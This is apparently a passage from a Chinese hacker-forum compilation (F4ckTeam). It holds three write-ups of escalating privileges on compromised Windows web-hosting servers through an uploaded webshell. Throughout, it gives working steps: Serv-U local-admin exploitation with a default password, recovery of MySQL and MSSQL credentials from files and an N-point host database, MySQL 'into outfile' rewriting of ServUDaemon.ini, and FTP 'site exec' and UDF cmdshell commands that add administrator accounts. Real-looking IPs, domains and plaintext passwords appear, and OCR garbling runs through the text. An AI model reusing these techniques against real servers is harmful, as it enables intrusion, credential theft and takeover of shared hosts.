Current Directory :

WebRoot | Create Directory | Create File | Fixed(C:) | Fixed(D:) | Fixed(E:) | Fixed(F:) | Fix

	Filename
0	Paren Directory
0	DAEMC N Tools Lite
0	Microsoft SQL Server
0	MySQL
0	NewFinder
0	Npoint off
0	Serv-L
	Delete elected

翻到F盘找到了点在、有用的东西。

五、找到 mysql 目录破解 root 无效

Mysql 啊 SU 啊都有。。 先来试试 mysql 提权 翻到这里 F:\Program Files\MySQL\MySQL Server 5.0\data\mysql\ 下载 user.frm user.MYD user.MYI Manager >>

rent Directory : 🔁 🖓 🔤 🔤 🖓 🖓 🖓 L\MySC	QL Server 5.0\data\mysql\
bRoot Create Directory Create File Fixed(C	:) <u>Fixed(D:)</u> <u>Fixed(E:)</u> <u>Fixed(F:)</u> <u>Fixed(G:)</u> <u>Fixed(H:)</u> <u>Fixed(I:)</u> <u>Ki</u>
Filename	Last modified
Parent Directory	
columns_priv.frm	2006-10-20 06:37:40
columns_priv.MYD	2006-10-20 06:37:42

下载一个 C32 直接 16 进制模式打开这个 3 个下载的文件

I	- [(HEX)user.frm]																			
		文件(E)	编辑	輩(E)	搜	索(<u>5</u>)) ₫	至看()	D C	工具((I)	高级	\$(<u>A</u>)	窗	⊐(<u>₩</u>) 肴	習助()	H)		
	2		b É	1	6	\$	F,	, ₄ 5	3		2	0	*= *=	1	E B		F%\$	$\{ \widehat{f}_{\mu}^{\alpha} \} \mid \{$		
1	Enjoy C32asm 🙀 (HEX)user.frm																			
	<mark>000</mark> 000 000	<mark>00000:</mark> 00010: 00020:	FE 56 00	01 01 05	09 00 00	09 00 00	03 00 00	00 00 00	00 00 53	10 00 00	01 00 00	00 00 00	00 00 00	30 02 00	00 2A 00	00 00 00	E7 09 00	00 00 E7	VS.	0?¢ .*
	000 000 000	00030: 00040: 00050:	00 2F 00	00 2F 00	00 00 00	6B 00 00	C3 20 00	00 00 00	00 00 00	0A 00 00	00 00 00	00 00 00	k? //							
	000 000 000	00060: 00070: 00080:	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00		
	000 000 000	00090: 000A0: 000B0:	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	C:	Doc	umen	ts and Settings\Ad	ministra
	000 000 666	000C0: 000D0: 000F0:	00 00 66	00 00 66	00 00 66	00 00 66	00 00 66	00 00 66	00 00 00	00 00 66	00 00 66	00 00 66	00 00 66	00 00 00	00 00 66	6) 反) 十	汇编机 六进制	莫式 制模式	· 确)
	000 000 000	000F0: 00100: 00110:	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00 00 00	00	ាក់ ចច ពព	欠不要 UU AA	提醒我 (<u>A</u>)	
	000 000	00120: 00130:	00 00	00 00	00 00	00 00	00 00	00 00	00 00	00 00	00 00	00 00	00 00	00 00	00 00	00 00	00 00	00 00		

直接找到 mysql 的 root 帐号的加密密码

Enjoy C32asm Image (HEX)user.frm Image (HEX)user.frm Image (HEX)user.frm Image (HEX)user.frm 00000001: 01 00 55 FB 03 09 6C 6F 63 61 6C 68 6F 73 74 04 II2.localhost. 00000010: 72 6F 6F 74 2A 42 39 43 42 30 41 38 36 43 34 37 root*B9CB0A86C47 00000020: 34 39 32 35 46 32 38 31 30 42 44 37 36 45 0000030: 31 41 37 46 31 34 30 43 32 37 38 44 43 92 <th></th>																		
0000000: 01 00 55 FB 03 09 6C 6F 63 61 6C 68 6F 73 74 04 .112.localhost. 00000010: 72 6F 6F 74 2A 42 39 43 42 30 41 38 36 43 34 37 0000020: 34 39 32 35 46 32 38 31 30 42 44 37 36 45 00000030: 31 41 37 46 31 34 30 43 32 37 38 44 43 02	🚪 Enjoy C32a	sm	66 6 ()	HEX)u	iser.f	rm	()	HEX)	user	.MYI								
	000000000 0000010 0000020 0000030 0000030 0000040 0000050	01 72 34 31 02 02	00 6F 39 41 02 02	55 6F 32 37 02 02	FB 74 30 46 02 02	03 2A 32 31 02 02	09 42 35 34 02 02	6C 39 46 30 02 02	6F 43 32 43 02 01	63 42 38 32 82 82 A8	61 30 31 37 02 AC	6C 41 30 38 02	68 38 42 44 02	6F 36 44 43 02	73 43 37 02 02	74 34 36 02 02	04 37 45 02 02	
	0000010: 0000020: 0000030: 0000040: 0000050:	72 34 31 02 02	6F 39 41 02 02	6F 32 37 02 02	74 30 46 02 02	2A 32 31 02 02	42 35 34 02 02	39 46 30 02 02	43 32 43 02 01	42 38 32 02 A8	30 31 37 02 AC	41 30 38 02	38 42 44 02	36 44 43 02	43 37 02 02	34 36 02 02	37 45 02 02	root*89CB0A86C47 492025E2810BD76E 1A7************************************

尼玛。没,MD5 会员的伤不起 mysql 提权没戏了。。

六、端口探测 FTP 默认加用户无效

换思路来端口

PortScan >>

IP: 127.0.0.1 Port: 21,25,80,110,1433,1723,330	δ,3389,4899,5631,4395 Scan
--	----------------------------

127.0.0.1 : 21	Open
127.0.0.1 : 25	Close
127.0.0.1 : 80	Open
127.0.0.1 : 110	Close
127.0.0.1 : 1433	Close
127.0.0.1 : 1723	Close
127.0.0.1 : 3306	Close
127.0.0.1 : 3389	Open
127.0.0.1 : 4899	Close
127.0.0.1 : 5631	Close
127.0.0.1 : 43958	Open
127.0.0.1 : 65500	Close

嘿嘿 43958 哟西。。直接

UserName : localadministrator	PassWord : #I@\$ak#.Ik;0@P	Port : 43958	
CmdShell : cmd.exe /c net user			
Exploit 220 Serv-U user locala 331 User na pass #10¢ak 230 User lo SITE MAINTE 230-Switchi 230 Version 900-Type=St 900-Type=Li 900-DaysLef 900-Status= 900-CurAcco 900-MaxAcco 900-MaxDoma 900-MaxDoma	FTP Server v6.4 for dministrator me okay, need passw #.1k;00P gged in, proceed. NANCE ng to SYSTEM MAINTEL =1 atus Online cense t=0 KeyValid unts=55 unts=-1 ins=-1 ers=-1	WinSock ready ord. NANCE mode.	
	•		

--Changerassworu=0 -QuotaEnable=0 -MaxUsersLoginPerIP=-1 -SpeedLinitUp=0 -SpeedLinitUp=0 -SpeedLinitUp=0 -MaxNtUsers=-1 -IdleTimeOut=500 -SessionTimeOut=-1 -Expire=0 -RatioBoum=1 -RatioScredit=0 -QuotaCurrent=0 -QuotaCurrent=0 -QuotaCurrent=0 -QuotaMaximum=0 -Maintennee=System -PassoordType=Regular -PastoorMomeRM Access=c:\[RWAMELCDP 200-User=bin 200 User setting saved Exec Cmd....... 220 Serv-U FTP Server v6.4 for WinSock ready... user bin 31 User name okay, need password. pass bintpp 230 User logged in, proceed. site exec cmd.exe /o net.u. 200 User logged in, proceed. site exec cmd.exe /o net.u. 210 Goodbye! -DELTEDOMAIN -IP=0.0.0.0 PortMo=S2521 220 Domain deleted

成功了。但是问题还是来了。。尼玛 3389 怎么也连不上去。我关掉它防火墙也不行(命令 net stop sharedaccess 关闭防火墙)

X尼玛哦。有点希望就破灭。

七、发现是 N 点虚拟机下载数据库

继续换思路吧。。

继续翻目录。。

Current Directory Current Files NpointSoft(npointhost1.9.6)

WebRoot | Create Directory | Create File | Fixed(C:) | Fixed(D:) | Fixed(E:) | Fixed(F:) | Fixed(G:) | Fixed(H:) | Fixed(I:) | Kill Me

	Filename	Last modified
0	Parent Directory	
0	isapi	2012-01-14 03:13:12
0	siteerrorlist	2012-01-14 03:13:13
0	web	2012-03-08 11:21:29
0	welcome	2012-01-14 03:13:12
0	winrar	2012-03-07 12:22:08
	npoint.dll	2011-02-18 03:57:38
	npointhost.look	2012-01-14 03:13:59
	npointreg.key	2012-01-14 03:13:59
	NpointServer.exe	2011-02-18 01:52:52
	sethost exe	2011-02-19 07:54:10
尼玛	马这不是 N 点虚拟机么 。。呵呵 。淫荡的一笑。	
根	居前辈的提示	
这	个下载一个数据库就行。。	

果断下载

Curre	nt Director,	ointSoft\npointh	ost1.9.6\web\host_date\		
<u>Web</u> Fixed	Root <u>Create Directory</u> <u>Create File</u> I(L) <mark>Kill Me</mark>	e <u>Fixed(C:)</u> <u>Fix</u>	ed(D:) Fixed(E:) Fixed(F:)	<u>Fixed(G:)</u> <u>Fixed(H:)</u> [図
	Filename		Last modified	Size	Action
0	Parent Directory				
	#host # date#196.mdb	数据库文件	2012-02-29 01:20:27	480.00 K	Down Copy Edi
	Delete selected				0

Copyright © 2006-2009 Bin'Blog All Rights Reserved.

下载了一看 sa 密码	b ro	ot 密码都在里	且面呢		
11井鉯姑厍 U/	子段	名	_ 天谜子	1	ș 査询(Q)
	记 证	录详情			
<pre>#host+#+date#196.mdl adminlogo(1) dnsscript(0) domainlist(0) errorlist(62) hostcs(1) mailhost(0) mailusername(0) mssql(0) msdns(0) sitehost(52) siteinfo(1) sitepath(1)</pre>		字段 mssqlport mssqlsame mssqlsa mssqlpass mysqlpass mysqlport mysqlpost mysqlass apprea webpage mysqldatepath mailid apiuser apipass 洋细信息	值 Sa EUVGU@EIIMP@CCLB.TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT		第一条记录 上一条记录 下一条记录 最后一条记录

根据前辈说的解密方式

<!--#include file="inc/conn.asp" -->

<!--#include file="inc/siteinfo.asp" -->

<!--#include file="inc/char.asp" -->

<%

set iishost=server.CreateObject("npoint.host")

x=iishost.Eduserpassword("NLFPK@OJCOCLA@E@FEKJMFADLALKLF@JHOIMAHO @LCDBAAMEOEKGKM@A",0)

response.write x

%>

保存这个为 asp 文件到虚拟机 web 目录执行一下就行。 可是那是 N 点 193 啊。

今天遇到的是 N 点 196 啊。 我草 。执行不显示密码。。 八、解密受阻 换思路解密成功

悲剧了。。

继续换思路。。

这两种 N 点 193 和 N 点 196 加密算法会不会是不是一样呢。。 嘿嘿。。

果断下载一个 N 点 193 本地搭建一个环境。。 尼玛 有浪费我 1 个小时啊。。

搭建完成直接来解密 还是不行啊提示我没权限查看这个网页。。尼玛哦。正尼玛变态。。

最后我把这一句加到 index.asp 上面成功解密 获得了 mssql 的 sa 密码 mysql 的 root 密码



尼玛 下面就是 sa 提权了。。

九、提权成功

第4节跟着黑客走吃喝全都有,提权(二)

作者: Doing

来自:法客论坛-F4ckTeam

地址: http://team.f4ck.net

1、进 shell 检查权限

首先这个是看到坛子里面的一个求助提权贴提权的,以前在 hake 发过,但没这么详细 溜达进 shell 看了下子。。

aspx 支持的完好,不过权限还是比较低的。。

IISSPY 可以完美跨目录,那么提权还是有大大的希望的。。

2、扫端口

127.0.0.1:21 Open
127.0.0.1 : 25 Open
127.0.0.1 : 80 Open
127.0.0.1 : 110 Open
127.0.0.1 : 1433 Open
127.0.0.1 : 1723 Close
127.0.0.1 : 3306 Open
127.0.0.1 : 3389 Open
127.0.0.1 : 4899 Close
127.0.0.1 : 5631 Close
127.0.0.1 : 43958 Open
127.0.0.1 : 65500 Close

3、43958 开了 那就来试试把。。 221 Serv-UFTP Server v6.4 for WinSock ready... user localadministrator 331 User name okay, need password. pass #l@\$ak#.lk;0@P 530 Not logged in. SITE MAINTENANCE 530 Not logged in.

那就 fuck 一下吧。提示没登录进去。。。 换吧..

4、1433 开了 得到 dbo 权限 翻了几个站的目录找到了一个 db_ower 权限的 连上去 不能执行'

用户 'guest' 没有运行 DBCC addextendedproc 的权限。

MSSQL Version : Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c)

1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

SrvRoleMember : db_owner

提权总会失败那么多次。。

再次 fuck 一下。。

不过,大家会一定记住这个存储过程(xp_dirtree)他是可以浏览目录的,那么我们就可以拿来翻目录 是吧 EXEC MASTER..XP_dirtree 'c:\',1,1

把每一个盘都给他翻一下 看下我们希望得到的信息,

EXEC MASTER..XP_dirtree 'D:\Program Files\',1,1

找到了一个这个

360	1	0
Dimac Development	1	0
FlashFXP	1	0
Helicon	1	0
Microsoft SQL Server	1	0
Persits Software	1	0
Serv-U	1	0
udf.dll	1	1
WinWebMail	1	0

5、找到 Serv-U 目录 无法访问

传说装 Serv-U。。尼玛找到路径了

构造一下 D:\Program Files\Serv-U 围观一下有没有权限,

其实想法是好的,现实是残酷的。。deny 掉。不能访问。。你大爷哦。。

继续搞、

EXEC MASTER..XP_dirtree 'e:\appserv\',1,1 回显

MySOL 1 0	
php5 1 0	
time.exe 1 1	
Uninstall-AppServ2.5.9.exe 1 1	
www 1 0	

这次很耿直。直接可以访问 e:\appserv\mysql\data\mysql\,

下载了 user.myd 然后 C32打开加密密码是,

F8FC145E6CAD979481E1EFDB08110E11ADDE30**

尼玛还是收费的。。我也是穷 B 。没得钱搞。。本来就像放弃的时候。。

发帖的楼主花了一毛钱果断破解了。。。好吧。。。继续搞下去吧 找一个 php 连上去 6、尝试 mysql 提权

连上去执行一下 select version(); 执行 SQL 语句成功返回结果:

5.0.45-community-nt-log

有反应。。那就导出 udf.dll 吧 直接创建 cmdshell 函数吧

create function cmdshell returns string soname 'udf.dll'

回显成功,靠就是 select cmdshell("net user"),返回这个尼玛。

执行 SQL 语句成功

7、尝试 su 提权

Shell 无法启动,GetLastError=Shell 无法启动,GetLastError=S

G fa	退 • 🕥 👔	💈 🏠 🍤 ।	恢复 🔹 🔗 无痕	- 🥎 收藏夹	0	日本
也址(⊇)	la http://w	sa.php	p?action=SQL			
叟索(<u>R</u>)	🛃 输入文字, 🛙	直接搜索	🔍 搜索	• 🏫收藏 •	3 谷歌	3 网址大全
MYSQL	连结成功					
DLL导 c:\wii	出路径: <mark>注意</mark> : ndows\udf.dll	MYSQL 5.0以上	上版本请使用系 日本	统目录! 3到此目录		
SQL命	令:		٠			
select	t cmdshell('net	user daxia\$ 123	3456 /add');		执行	
回显线	吉果:					
cmdsh Shell;	ell('net user da 无法启动,GetLast 	xia\$ 123456 /ac Error=Shell无法 	id') (启动,GetLastE)	rror=Shell无法	启动,Get	LastError=S
看了邪 靠悲剧	8上面说这个是背 了	f管理限制了。?	殳 system 权限、			
不过手	里有了 root 密码	00				
那么就	可以在磁盘上写	入和读取文件了	0 0			
想了半	大。。					

我们来试试 Serv-U, 刚才不是说没权限访问么那个目录么, 但是两个数据库权限连起来不就是有权

限了么? 第一 SQL server 的 DBO 权限是可以读到这个文件的路径。 第二 MYSQL 的 root 权限是可以写入文件的。SU 替换文件提权不就是可以查看到路径后写入 ServUDaemon.ini 就行了么? 找到文件路径 D:\\Program Files\\Serv-U\\ServUDaemon.ini 构造 mysql 语句读取这个文件里面的内容 mysql>create table a (cmd text); mysql>load data infile 'D:\\Program Files\\Serv-U\\ServUDaemon.ini' into table a; mysql>select * from a; mysql>drop table a; 回显直接显示了所有的 Serv-U 用户名和加密的密码。这个可以在网上找到工具破解的 一定保存好 这些信息。。 读取文件是不能提权的 。 我来修改一下 ServUDaemon.ini 因为有 root 这个是可以写入文件到磁盘的。。 是否可以呢。。 这个办法首先声明 我本机测试了。完美成功。 为什么不拿这个站测试 是因为我还年轻 。。还在读书。。还有家人。。 可以这样写 mysql>create table a (cmd text); mysql>insert into a values (" [USER=DOING|1] Password=ng98F85379EA68DBF97BAADCA99B69B805 HomeDir=c:/ RelPaths=1 TimeOut=600 Maintenance=System Access1=C:/|RWAMELCDP Access2=D://RWAMELCDP Access3=E:/|RWAMELCDP "); mysql>select * from a into outfile "D:\\Program Files\\Serv-U\\ServUDaemon.ini"; --本句就是写入数据, 把原来的信息都替换掉了。。添加一个用户名为 DOING 密码为111111 的用户。这个用户拥有 C 盘 的执行权限了。。 8、SU 提权 后面就简单了。

c:/>ftp ip ftp>quote site exec net user 123\$ 456789 /add ftp>quote site exec net localgroup administrators 123\$ /add

9、总结

提权有的时候是比较综合性的,要考虑端口、数据库、应用程序 等等所有目标计算机有的程序都是 我们利用的工具。

第5节N点主机提权

作者: yueyan 邮箱: yueyan@f4ck.net 来自: 法客论坛-F4ckTeam 地址: http://team.f4ck.net

.

由于习惯用菜刀执行命令,所以用 aspx 一句话。

习惯性用菜刀传 exp 用大马扫目录 收集信息:

 用 aspx 马收集信息

 系统信息 >>

 OS 名称:
 Microsoft(R) Windows(R) Server 2003, Enterprise Edition

 系统类型:
 X86-based PC

 127.0.0.1 : 21
 Open

 127.0.0.1 : 3306
 Open

 127.0.0.1 : 3389
 Open

 Server Ip
 : 199.36.77.9:80

 Terminal Port
 : 8819

用户(组)信息 >> N 点虚拟主机管理系统 V1.9.6-管理账号 ND19_qoiso 其中一个用户

先寻找可读可写看下执行命令情况后继续收集信息:

· [] [] [] [] [] [] [] [] [] [] [] [] []
[目录]c:\windows\PCHealth\ERRORREP\QHEADLES\
[目录]c:\windows\PCHealth\ERRORREP\QSIGNOFF\
[目录]c:\windows\Registration\CRMLog\
[目录]c:\windows\system32\spool\PRINTERS\
[目录]c:\windows\Temp\
[文件]c:\Documents and Settings\ [缺少对象]
[目录]c:\Program Files\Zend\ZendOptimizer=3.3.0\
[文件]c:\Program Files\Zend\ZendOptimizer=3.3.0\errors.txt
[文件]c:\Program Files\Zend\ZendOptimizer=3.3.0\optimizer_icon.ico
[文件]c:\Program Files\Zend\ZendOptimizer=3.3.0\poweredbyoptimizer.gif
[目录]c:\Program Files\Zend\ZendOptimizer=3.3.0\docs\
[文件]c:\Program Files\Zend\ZendOptimizer=3,3,0\docs\EULA.txt
[文件]c:\Program Files\Zend\ZendOptimizer=3.3.0\docs\README.txt
[文件]c:\Program Files\Zend\ZendOptimizer=3.3.0\docs\Zend_Optimizer_User_Guide.pdf

发现 c:\windows\Temp\可读可写 但是上传后发现不可以执行文件



最后在 E:\RECYCLER\ 发现可以执行文件,为什么会这样,我也不太清楚。忘大牛科普。 先上传了 cmd 和巴西烤肉

E:\RECYCLER\cmd.com E:\RECYCLER\Churrasco.com

执行巴西烤肉试试。。。。。不成功 /churrasco/-->Couldn't run command, try again!



查看常用 exp 的补丁无法查询

dir c:\windows\>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt 拒绝访问

也不想到 systeminfo 去查找有无未打的补丁。 直接上传这些 exp(貌似 7 个 exp) 同样无果。 似乎忘了一件事, N 点虚拟主机管理系统 V1.9.6-管理账号

N 点虚拟主机。。。。 果断上强大的论坛搜索了一下。 有两个主题是关于这方面的,一个是一个 paper,另外一个估计是个视屏 (因为是 2 月的主题,用的是 115 的下载链接,已经无法下载了)

	快速 👻 高級
DISCUZ!·搜索	搜 索
结果:找到"n点" 相关内容 2 个	
<u>N点提权一例</u> 156 个回夏 - 972 次查看 回复后可见下载地址 你们遣的 ***** 本内容被作者隐藏 ***** 2012-2-18 23:20 - <u>音符</u> - 技术文章{ Article About Security }	
<u>记─次N点提权======新人求罩啊======</u> 31 个回夏 - 176 次查看	
大牛别笑我,没啥技术含重 好了就不隐藏了	
2012-8-24 11:20 - <u>回眸、龙少</u> - <u>技术文章{</u> Article About Security <u>}</u>	

大概了解了下 N 点虚拟主机 虚拟主机的提权

发现不能按部就班.......像我这样的新手朋友们最应该避免的就是按部就班,一定得有自己的思路。

文件(夹)管理 >>		
当前目录: C:\Program Files\NpointSoft\npoi	inthost1.9.6\	
	e(A:) 磁盘(C:) CDRom(D:) 磁盘(E:) 木马自杀	
文件(夹)名	最后修改时间	大小
Parent Directory		
npointhost.look	2012-04-09 06:38:08	40 B
Delete selected		

在这个目录下什么都没有,更不可能下载数据库查看 root 密码什么的。

所以常规的 n 点主机提权无果。

回到信息收集, 3306 端口, mysql 提权。

Mysql 提权就是需要找 root 密码。

常用的找密码方法就是网站的配置文件里面找, mysql 安装目录下找。

由于网站太多,先试下安装目录下

执行 set 命令, 找到 mysql 目录。



无访问权限, type 命令无效。

再试试网站中找吧。

利用大马的文件搜索功能,每种马应该都有的功能。一般搜索 conn 和 config 这两个关键字。

路径: E:\	www\		注:多路徑使用","号连接.
文件名: con	in	搜索 [部分也行]	
:\www\\mv51af	ov9n.dfshou.com∖admin∖f	ckeditor\editor\ma xc ms editor	server\asp\ma x cm s connector.a
E:\www\\my51	a6y9n. dfshou. com\hxlon	g\fsoconn. asp	
E:\www\\www.	dfshou.com\inc\conn.asj		
		共搜索到3個結果	
		善時: 718.75 全秒	
		22年 12年	
路 径: E:\\	www\		
文件名・「この	fia	搜索 [郭公冉行]	
	ng		
7 · \	r9n dfrhou aon∖admin\f	aleoditor\aditor\ma wa me aditor	corrections a me fair config or
E:\www\\mz51;	afw9n dfshou com\admin\	fckeditor\fckconfig_is	server (asp (max_c_ms_rck_config. as
R.1	a6v9n.dfshou.com\admin\	admin config asn	
E. 1888 110 Volt		Le c:	
E:\www\\mv51; E:\www\\mv51;	a6v9n.dfshou.com\hxlong	htsocontig asp	
E:\www\\my51; E:\www\\my51; E:\www\\my51;	a6y9n.dfshou.com\hxlong a6y9n.dfshou.com\inc\en	sine'model'MaxCMS Common.config	
E:\www\\my51; E:\www\\my51; E:\www\\my51; F:\www\\my51;	a6y9n.dfshou.com\hxlong a6y9n.dfshou.com\inc\en a6y9n.dfshou.com\inc\co	stsoconfig.asp gine\model\MaxCMS_Common.config. nfig.asp	
E: \www\\my51: E: \www\\my51: E: \www\\my51: E: \www\\my51: F: \www\\my51:	a6y9n.dfshou.com\hxlong a6y9n.dfshou.com\inc\en a6y9n.dfshou.com\inc\co a6y9n.dfshou.com\inc\Re	ctsoconfig.asp gine\model\MaxCMS_Common.config nfig.asp writeBule.config	
E:\www\\my51: E:\www\\my51: E:\www\\my51: E:\www\\my51: E:\www\\my51: F:\www\\my51:	aby9n. dfshou.com\hxlong aby9n.dfshou.com\inc\en aby9n.dfshou.com\inc\co aby9n.dfshou.com\inc\Re afshou.com\inc\editor\f	(\fsoconfig.asp gine\model\MaxCMS_Common.config nfig.asp writeRule.config jakeditor\fakoonfig_is	

找到了这三个配置文件。

 $E: www \mbox{www} s1a6y9n.df shou.com \mbox{inc} config.asp$

打开看后, 全是配置的 access 的数据库

E:/www/my51a6y9n.dfshou.com/inc/config.asp

<%		
Dim site	eName, siteUrl, sitePath, databaseType, databaseServer, databaseName, tableUser, databaseUser, databasepw	
d, access	sFilePath,templateFileFolder,defaultTemplate,gbookStart,commentStart,cacheStart,siteMode,cacheTim	1
e, cacheF	Flag, IsCacheSearch, CacheSearchTime	=
siteName	ue="电影网 - 免费电影网_在线电影_最新电影_电影在线观看_高清电影" '站点名称	
siteUrl=	.="127.1" '站点网址	1
sitePath	<u>h="" '安装目录(根目录为空; 二级目录填写为:二级</u> 目录名/)	
database	:eType=0 '数据库类型(0为access; 1为sqlserver)	
database	eServer="(local)" 'sqlserver数据库地址	
database	:eName="maxcms" 'sqlserver数据库名称	
tableUse	ser=″″ 'sqlserver表所属用户	
database	:eUser="sa" 'sqlserver数据库账号	
database	sepwd="sa" 'sqlserver数据库密码	
accessFi	'ilePath="/inc/datas.asp" 'access数据库文件路径(站点在根目录为:/inc/datas.asp; 二级目录为: /二级	
目录名/i	'inc/datas.asp)	
template	eFileFolder="fan91.com"	
default1	Template="dy12"	
gbookSta	art=1	
comment S	Start=1	
1 1 21		

E:/www/www.dfshou.com/inc/conn.asp

错□<!--#include File="Config.Asp"--> <%

dim Conn

dim DataBaseType, DataBasePrefix, DataBaseAccessPath, DataBaseName, DataBaseUser, DataBasePass, DataBasePort, D ataBaseServer

鏁版嵁搴撶被睽曰: 鍊煎垎揉 负 access ; mssql ; mysql

DataBaseType = "access"

'ACCESS/MSSQL/MYSQL: 鏁版嵁搴撹″鍓嶇紑

DataBasePrefix = "5U_"

'ACCESS: 鏁版嵁搴撶粷潾硅矾寰□

DataBaseAccessPath = "/µnc/db/#dbFE87.Mdb"

'MSSQL/MYSQL: 鏁版嵁搴撴清鍔″櫒

本来以为是其他网站的配置文件我还没找出来,结果大致浏览了下网站,除了

http://my51a6y9n.dfshou.com http://www.dfshou.com/ 这两个网站有配置文件外,其他的都是只有两个文件。 一个 index.html 还有个 nkddcnfmab.js

网站配置文件无果。。。。

本来想利用星外的 Oday 看对 n 点主机是否通用,发现不可以。

E:\www\www.dtshou.com\inc\>E:\ Using in FreeHost - Code By Ice Author: 9044360[at]qq.com	RECYCLER\IIS.exe e			
-i Read IIS ID For FreeHost.				
-u GetIIS UserName and PassWord.				
Examlpe: IIS.exe -i IIS.exe -u ID				
E:\www\www.dfshou.com\inc\>E:\ Using in FreeHost - Code By Ice Author: 9044360[at]qq.com	RECYCLER\IIS.exe -ND19_ ?	qoiso		
—i Read IIS ID For FreeHost.				
-u GetIIS UserName and PassWord.				
Examlpe: IIS.exe -i IIS.exe -u ID				
E:\www\www.dfshou.com\inc\>				
继续想办法:				
在 IIS 探测 >> 发现这 199.36.77.9:8090: C:\web\webfi	几个东西 iles\phpMyAdmin-3.4.7			
133 IUSR_VPS-COMPUTER YRV\$>Ro6-B	5w#3 127.0.0.1:8090:	C:\web\webfile	es\phpMyAdmin-3.4.7	
199.36.77.9:80: C:\web\webfiles	hyphpinfo	Columbia	(abfiles) phointe	I
199.36.77.9:2896: C:\Progr Extensions\50\isapi_vti_adm	am Files\Common	Files\Microsoft	Shared\Web	Server
100 IUSR_VPS-COMPUTER YRV\$>Ro6-B5w#3 :2896:	C:\Progra	m Files\Common Files\Microsoft Shared\Web Se	rver Extensions\50\isapi_vti_adm	
第一个是 phpmyadmin 是用考试着访问 199.36.77.9:8090	来管理 mysql 数据库的 无法访问	1		
Phpmyadmin 里面应该配置这	又 root 的密码			

libraries\config.default.php 跟目录下个这个文件就是配置 root

查看这个文件,在记事本中搜索 root C:\web\webfiles\phpMyAdmin-3.4.7\libraries\config.default.php

/ config.default.php - 记事本	87 LY N		1.0	ROGL.	1.76
文件(F) 编辑(E) 格式(O) 查看(V) 帮助(H)					
\$cfg['Servers'][\$i]['user'] = ' <mark>root</mark> ';					
/**	查找			×	
* MySQL password (only needed w	查找内容(M): root	*6		査拔下一个の)	
* * @alobal string \$cfa['Servers'][\$i][🔲 区分大小写 (C)	の同じ の同上の	◉向下᠐)	取消	
*/					
\$cfg['Servers'][\$i]['password'] = '';					
/**					

最近老发现人品不好,你妹的,你不配置 phpmyadmin 安装这个来干嘛!!!!

无语了。

继续查看剩下的两个目录

文件(夹)管理 >>					
当前目录: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\50\isapi_vti_adm\					
文件(夹)名	最后修改时间	大小			
Parent Directory					
💼 aspnet_client	2011-10-29 04:25:45				
💼 help	2011-10-29 04:23:14				
🛅 images	2011-10-29 04:23:23				
📃 admin.dll	2007-03-07 12:00:00	20.00 K			
📄 fpadmdll.dll	2007-03-07 12:00:00	26.70 K			
Delete selected					

发现无可利用的。。。。

提不下?

继续在 IIS 探测 >> 查找这些网站,发现全部网站都没有配置 mysql 连接。

好吧,继续浏览。

翻到 e 盘。 Z-Blog_1_8_Walle_100427 Discuz_X2_SC_GBK 打开看后,发现还没配置数据库呢。

想了下再找找吧,再次利用大马的搜索功能,已经有点心灰意冷了。

扩大搜索吧,扩大到 e 盘跟目录去!!!!

	搜索引擎	
路 径: E:\] 注:多路徑使用", "号连接。
文件名: cor	nfig [搜索 [部分也行]	
R.\\	2015	
R:\\Sugme_ut	triSucms_utri全新安装(inclear(or (icked)(or (ickconing,)s	
R: Walmun la	rroucms_atr(<u>ا جاتها چ</u> ر the config. asp	o config is
E. ((a(www.10	sei23.tk\ADMIN\RCKeditor\feksonfig_is	e. contrg. js
F:\\a\www]o	sel23 tk\PINGTN\n_config_esn	
E: \\a\www.xi	ingruovs tk\config\config global nbn	
E:\\a\www.xi	ingruoys tk\config\config global default nhn	
E:\\a\www.xi	ingzuovs.tk\config\config ucenter.php	
E:\\a\www.xi	ingzuovs.tk\config\config ucenter_default.php	
E:\\a\www.xi	ingzuovs. tk\source\module\connect\connect config.php	
E:\\a\www.xi	ingzuovs.tk\static\image\common\connect config mark.png	
E:\\a\www.xi	ingzuoys. tk\uc_server\data\config. inc. php	
E:\\a\www.xp	ogames.tk\wp-admin\setup-config.php	

我一个个的查看,一个个的查看。。。。。 估计查看了十个左右。

估计是老天眷顾。终于在服务器中废弃的网站文件中发现了一些东西。

 $E:\a\www.xptm.tk\wp-config.php$

E:\a\www.xptm.tk\wp-config.php				
 * installation. You don't have to use the web site, you can just copy this file * to "wp-config.php" and fill in the values. * 				
* @package WordPress */				
// ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'mywp006');				
/** MySQL database username */ define('DB_USER', 'root');				
/** MySQL database password */ define('DB_PASSWORD', 'c1X2p3');				
/** MySQL hostname */ define('DB_HOST', 'localhost');				
/** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8');				
/** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''):				

配置文件如下: define('DB_NAME', 'mywp007');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'c1X2p3');

/** MySQL hostname */ define('DB_HOST', 'localhost');

其实现在你已经可以试下利用数据库账号登陆下 3389。我经常遇见密码是一样的。 最后证实,密码只相差一个字符。

继续提权,利用 udf 提权 系统权限,果断添加用户 yueyan

执行成功						
地址 localhost	端口 3306	用户 root	密码 c1X2p3	库名 mywp007	MYSQL连接	
可加载路	·径				安装DLL	
		安装	成功后可用			
whoam	i	~~~	22270 - 17-1	命令集合 ▼	执行	
nt author	ity\system				*	
		完成	ļ			

最后成功进入服务器:

青稍候			
. 19 1	Windows Server 2003 Enterprise Edition		
Copyright © 1985-2003 Microsoft	Corporation	Microsoft	
